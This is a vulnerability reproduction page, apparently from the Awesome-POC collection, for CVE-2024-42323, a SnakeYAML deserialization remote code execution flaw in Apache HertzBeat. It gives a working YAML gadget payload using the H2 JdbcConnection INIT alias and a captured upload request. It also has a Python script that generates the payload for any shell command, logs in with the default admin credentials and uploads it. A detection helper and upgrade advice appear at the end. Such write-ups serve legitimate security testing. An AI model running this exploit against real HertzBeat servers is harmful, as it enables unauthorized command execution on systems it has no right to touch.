Awesome-POC/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md
2025-05-26 15:47:04 +08:00


# Apache HertzBeat SnakeYAML Deserialization Remote Code Execution Vulnerability CVE-2024-42323
## Vulnerability Description
Apache HertzBeat is an open-source real-time monitoring and alerting tool. It monitors operating systems, middleware, databases and other targets and is managed through a web interface.
Before version 1.6.0, HertzBeat parsed YAML files with a vulnerable SnakeYAML build whose default constructor instantiates whatever Java class a `!!` global tag names. An authenticated user who imports monitors or alert definitions through `/api/monitors/import` or `/api/alert/defines/import` can therefore upload crafted YAML that deserializes untrusted data and, via a gadget class already on the classpath, executes arbitrary commands on the server.
References:
- https://forum.butian.net/article/612
- https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx
## Affected Versions
```
Apache HertzBeat < 1.6.0
```
## Environment Setup
Using Vulhub, start a vulnerable HertzBeat 1.4.4 server with:
```
docker compose up -d
```
Once the service is up, open `http://your-ip:1157/dashboard` to reach the HertzBeat console. The default login credentials are:
- Username: `admin`
- Password: `hertzbeat`
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090855824.png)
## Reproduction
First, prepare a malicious YAML file; the filename must end in `.yaml`. The document is a single node tagged `!!org.h2.jdbc.JdbcConnection`, so SnakeYAML instantiates an H2 `JdbcConnection` from the sequence of constructor arguments, and the `INIT=` clause of the JDBC URL defines a Java alias and calls it. Two escaping layers are in play: inside the YAML double-quoted scalar, `\\;` decodes to `\;`, which H2 requires so that the semicolons inside `INIT` are not parsed as URL setting separators, and `\"` decodes to the quotes of the Java string literal. The gadget relies on the H2 JDBC driver being on HertzBeat's classpath. The file content is:
```yaml
!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
```
Then log in to the HertzBeat console, open any monitor list page, find the import button, and import the malicious YAML file prepared above:
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090950864.png)
When HertzBeat deserializes the uploaded YAML, the command executes. The request the browser sends looks like this (the `Authorization` header carries the logged-in session's JWT):
```
POST /api/monitors/import HTTP/1.1
Host: your-ip:1157
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Origin: http://your-ip:1157
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6788.76 Safari/537.36
Accept: application/json, text/plain, */*
Referer: http://your-ip:1157/monitors
sec-ch-ua-platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvl3ne8kWpIEZzrNr
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw1jMsKwjAQRf9l1h0wj8akvyIuMs4I8dFKJhVB_HdT0OU593LecGkFJjjFwMLkMPlzQp8dY2S3QwqUKFg23hIMoCv1c-Z7mTsV1U66VplFFdtylRlV6lPqtuYGk9l7E8bReTuAvB5_EdMm6nKTXjj8gsfPF5W5Kao.lj6IwR1vmaTc2T0t2VJlwOCTMJeu4tlOejqygKjtlHV-vj2Ew2Cw5ljUv-9pGxDB_yKnfrKp89i4QhYoQAs8vA
Content-Length: 456

------WebKitFormBoundaryvl3ne8kWpIEZzrNr
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
------WebKitFormBoundaryvl3ne8kWpIEZzrNr--
```
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091514662.png)
The command executed successfully:
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091629839.png)
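The whole procedure above, as an added example script (not code from the original page, Vulhub or the HertzBeat project). `build_payload` regenerates the page's YAML for an arbitrary command, applying the Java-literal and YAML-scalar escaping layers in order; `build_multipart` produces the same upload body the browser sent; `find_global_tags` is a detection helper that lists the Java class names a YAML body references through global tags, usable on the server side before parsing or as a rule over captured upload bodies. The login endpoint `/api/account/auth/form`, its `identifier`/`credential` JSON body and the `data.token` field in its response are assumptions, since the page only shows the resulting Bearer token. Only `main()` touches the network; everything else runs offline.

```python
#!/usr/bin/env python3
"""CVE-2024-42323 helper: payload generation, upload body, tag detection.
Example code added to this page; not from Vulhub or HertzBeat. Stdlib only."""
import json
import re
import sys
import urllib.error
import urllib.request

# Short tags that resolve to built-in YAML types. Anything else after "!!"
# is a global tag that SnakeYAML's default constructor maps to a Java class.
STANDARD_TAGS = {
    "str", "int", "float", "bool", "null", "map", "seq", "set", "binary",
    "timestamp", "omap", "pairs", "merge", "value", "yaml",
}

# Short form `!!pkg.Class` and verbatim form `!<tag:yaml.org,2002:pkg.Class>`.
# A `%TAG` directive that rebinds the `!` handle is not covered.
TAG_RE = re.compile(r'!!([A-Za-z_][\w.$]*)|!<tag:yaml\.org,2002:([^>\s]+)>')


def build_payload(cmd: str) -> str:
    """Return the page's JdbcConnection gadget YAML with `cmd` as the OS command."""
    # Layer 1: `cmd` becomes a Java string literal inside the H2 alias source.
    java_cmd = cmd.replace("\\", "\\\\").replace('"', '\\"')
    # H2 needs `\;` so the ';' inside INIT is not taken as a URL setting separator.
    init = (
        "drop alias if exists exec\\;"
        "CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException "
        '{ Runtime.getRuntime().exec("' + java_cmd + '")\\; }$$\\;'
        "CALL EXEC ()\\;"
    )
    url = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=" + init
    # Layer 2: the URL sits in a YAML double-quoted scalar, so `\` -> `\\`, `"` -> `\"`.
    yaml_scalar = url.replace("\\", "\\\\").replace('"', '\\"')
    return f'!!org.h2.jdbc.JdbcConnection [ "{yaml_scalar}", [], "a", "b", false ]'


def build_multipart(field, filename, content, content_type, boundary):
    """Build a single-file multipart/form-data body the way the browser does."""
    parts = [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"',
        f"Content-Type: {content_type}",
        "",
        content,
        f"--{boundary}--",
        "",
    ]
    body = "\r\n".join(parts).encode("utf-8")
    return body, f"multipart/form-data; boundary={boundary}"


def find_global_tags(yaml_text: str) -> list:
    """List Java class names referenced by global tags in `yaml_text` (sorted)."""
    found = set()
    for short, verbatim in TAG_RE.findall(yaml_text):
        name = short or verbatim
        if name not in STANDARD_TAGS:
            found.add(name)
    return sorted(found)


def login(base_url: str, user: str, password: str) -> str:
    """ASSUMPTION: HertzBeat form-login endpoint and response shape (not on the page)."""
    data = json.dumps({"identifier": user, "credential": password}).encode()
    req = urllib.request.Request(f"{base_url}/api/account/auth/form", data=data,
                                 headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)["data"]["token"]


def import_yaml(base_url, token, yaml_text, endpoint="/api/monitors/import"):
    """POST the YAML to one of the import endpoints named on the page."""
    body, ctype = build_multipart("file", "test.yaml", yaml_text,
                                  "application/x-yaml", "----pocboundary0123456789abcdef")
    req = urllib.request.Request(base_url + endpoint, data=body, method="POST",
                                 headers={"Content-Type": ctype, "Authorization": f"Bearer {token}"})
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def main(argv):
    if len(argv) < 2:
        print(f"usage: {argv[0]} http://your-ip:1157 [command]", file=sys.stderr)
        return 2
    base_url = argv[1].rstrip("/")
    cmd = argv[2] if len(argv) > 2 else "touch /tmp/awesome_poc"
    payload = build_payload(cmd)
    print("global tags in payload:", find_global_tags(payload))
    token = login(base_url, "admin", "hertzbeat")  # default credentials from the page
    status, text = import_yaml(base_url, token, payload)
    print(status, text[:200])
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

With the page's boundary string, `build_multipart` yields exactly the 456-byte body the captured request declares in `Content-Length`, and `build_payload("touch /tmp/awesome_poc")` reproduces the page's YAML byte for byte. `find_global_tags` is deliberately a pre-parse text check: it is not a substitute for constructing SnakeYAML with `SafeConstructor`, because the `!` handle can be rebound with a `%TAG` directive.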
## Remediation
A fixed release is available; affected users should upgrade to Apache HertzBeat 1.6.0 or later. Official download page: https://hertzbeat.apache.org/zh-cn/docs/download/
The import endpoints require authentication, so the default `admin` / `hertzbeat` credentials shown above should be changed on any reachable instance. More generally, application code that parses user-supplied YAML should construct SnakeYAML with `SafeConstructor` (or an explicit allow-list of types) rather than the default constructor, which resolves `!!` global tags to arbitrary classes.